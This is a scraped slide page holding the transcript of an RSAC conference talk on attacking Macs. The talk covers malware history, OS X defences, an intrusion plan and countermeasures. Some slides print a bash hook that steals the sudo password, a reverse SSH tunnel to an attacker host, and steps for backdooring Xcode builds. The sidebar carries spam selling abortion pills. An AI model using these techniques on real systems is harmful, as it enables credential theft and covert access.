Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUKSpring Boot vs Quarkus the ultimate battle - DevoxxUK
Spring Boot vs Quarkus the ultimate battle - DevoxxUK
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 

Hacking Exposed: The Mac Attack

  • 1. SESSION ID: #RSAC Dmitri Alperovitch HACKING EXPOSED: MAC ATTACK EXP-R04 Co-Founder & CTO CrowdStrike Inc. @DAlperovitch George Kurtz Co-Founder, President & CEO CrowdStrike Inc. @George_Kurtz
  • 2. #RSAC GEORGE KURTZ In security for 20 +years President & CEO, CrowdStrike Former CTO, McAfee Former CEO, Foundstone Co-Author, Hacking Exposed 2 A LITTLE ABOUT US:
  • 3. #RSAC DMITRI ALPEROVITCH Co-Founder & CTO, CrowdStrike Former VP Threat Research, McAfee Author of Operation Aurora, Night Dragon, Shady RAT reports MIT Tech Review’s Top 35 Innovator Under 35 for 2013 Foreign Policy’s Top 100 Leading Global Thinkers for 2013 3 A LITTLE ABOUT US:
  • 4. #RSAC The Ninjas Matt Bauer Sr. Software Engineer CrowdStrikeJaron Bradley Sr. Intrusion Analyst CrowdStrike
  • 5. #RSAC Agenda 5 Mac Attacks OSX Security Features Tradecraft The Setup & Attack Plan Demo Countermeasures
  • 6. #RSAC Mac market share rising 6 StatCounter 89.9 90.55 88.83 86.8 84.83 7.47 7.66 8.72 9.33 9.14 0 10 20 30 40 50 60 70 80 90 100 2012 2013 2014 2015 2016 Desktop/Laptop Market Share 2012-2016 Windows Mac
  • 7. #RSAC Mac Attacks 7 Winter 2006: Leap Worm Spreads as an archive sent over iChat to local users Limited harmful impact Fall 2007: RSPlug DNSChanger variant for Mac Distributed as fake video codec on porn sites Changed DNS servers to redirect to phishing and porn sites Fall 2010: Koobface Mac version of infamous Facebook worm
  • 8. #RSAC Mac Attacks (cont) 8 Fall 2011: Flashback Worm > 700,000 infected users Infection via Drive-By Java exploit Winter 2012: Gh0st RAT OSX Variant (MacControl) KEYHOLE PANDA targeted malware targeting Tibetan and Uyghur activists Delivered via Java and Office exploits Summer 2012: OSX/Crisis (Attribution: Hacking Team) Discovered in targeted intrusions Monitors and records Skype, Adium, web browsing Rootkit capabilities
  • 9. #RSAC Mac Attacks (cont) 9 Fall 2013: OSX/Leverage Discovered in targeted intrusions related to Syria Written in RealBasic Winter 2016: FakeFlash Signed fake Flash player update Installs scareware (FakeAV style)
  • 11. #RSAC OSX Security Features 11 Leopard: 2007 Quarantine Bit: extended file attribute flag indicating the file was downloaded from the Web Partial ASLR App Sandbox (Seatbelt) Snow Leopard: 2009 XProtect: AV-style blacklist updated monthly by Apple Lion: 2011 FileVault: full-disk encryption NX, Full ASLR
  • 12. #RSAC OSX Security Features (cont) 12 Mountain Lion: 2012 Gatekeeper Kernel ASLR Mavericks: 2013 Support code-signing for kernel extensions El Capitan: 2015 Full requirement to code-sign kernel extensions System Integrity Protection: prevent root user from tampering with key system files and raise the bar for rootkits and prevent code injection App Transport Security (ATS): HTTPS with forward secrecy by default in apps
  • 14. #RSAC Challenges to solve 14 Initial infiltration: Code Execution How to get around Gatekeeper? Possibilities 1. Exploit browser (eg. Java, Flash, native browser exploit) 2. Exploit productivity app (eg. Office, Preview, Adium) 3. Spearphish user with link/attachment (with Gatekeeper hack)
  • 15. #RSAC Bypassing Gatekeeper 15 Great research by Patrick Wardle @ Synack (VB2015 paper)
  • 16. #RSAC Challenges to solve (cont) 16 Privilege Escalation How to become root? Possibilities 1. Privesc exploit 2. Hook sudo in bash getpwd () { if [[ $BASH_COMMAND == sudo* ]]; then printf “Password:” read –s PASS; echo $PASS >/tmp/com.apple.launchd.pshbnY173 echo –e “nSorry, try again.n” fi } trap getpwd DEBUG 3. Ask the user during install
  • 17. #RSAC Challenges to solve (cont) 17 Persistence and Command & Control How to gain & keep remote access? Possibilities 1. Malware 2. Reverse ssh tunnel ssh –fN –R ${PortFwd}:localhost:22 acc@attackbox a. Save in plist file b. Convert to binary with plutil –convert binary1 ${ASEPplist} c. Save in /System/Library/LaunchDaemons (use SIP exception file)
  • 18. #RSAC Challenges to solve (cont) 18 Stealth How to keep hidden from easy discovery? Possibilities 1. Malware rootkit hooks 2. Bash hooks in /etc/profile “ps aux” before hook “ps aux” after hook
  • 19. #RSAC Challenges to solve (cont) 19 Permanent backdoor How do we quietly backdoor many other systems/applications? Ken Thompson: “Reflections on Trusting Trust” (1984) Lesson: Backdooring the compiler is the ultimate win Idea: Let’s hijack XCode compilation process
  • 20. #RSAC XCode hijacking 20 Yet again - great research by Patrick Wardle (CanSecWest 2015) Dylib hijacking (similar to DLL hijacking on Windows) 1. Place a malicious dylib in the search ppath of XCode application 2. Intercept compilation requests and inject backdoor source code, removing any information from the build log 3. PROFIT!
  • 21. #RSAC Putting it all together: Setup & Attack Plan
  • 22. #RSAC Attack Overview 22 1. Send spearphish “Software Update” package to victim 2. Package it up with signed binary vulnerable to Gatekeeper bypass 3. Steal root password via UI prompt and sudo hook (failsafe) 4. Establish persistent SSH reverse tunnel via ASEP plist 5. Hook /etc/profile to hide our SSH tunnel, files and root activities 6. Steal victim keychain through SSH tunnel 7. Use stolen keychain to move laterally to Windows systems and exfiltrate data (smbutil) 8. Implant Xcode malicious Dylib to backdoor compiled applications 9. WIN!
  • 23. #RSAC Network Setup 23 Windows File Share Victim Mac System Attacker Macbook (for keychain extraction) Attacker C2
  • 25. #RSAC Countermeasures 25 Keep close eye on /etc/profile, /etc/.bashrc, ~/.bash_profile, ~/.bashrc, ~/.bash_logout and ~/.inputrc Monitor for suspicious network connections out of your environment Monitor for any suspicious DYLIB writes to key /Applications and /System directories Use next-generation Endpoint Detect & Response (EDR) solutions
  • 26. #RSAC THANK YOU! 26 HOW TO REACH US: TWITTER: @GEORGE_KURTZ & @DALPEROVITCH LEARN MORE ABOUT NEXT-GENERATION ENDPOINT PROTECTION LEARN ABOUT CROWDSTRIKE FALCON: WWW.CROWDSTRIKE.COM/PRODUCTS REQUEST A DEMO: WWW.CROWDSTRIKE.COM/REQUEST-A-DEMO/ COME MEET US: BOOTH 2045 SOUTH HALL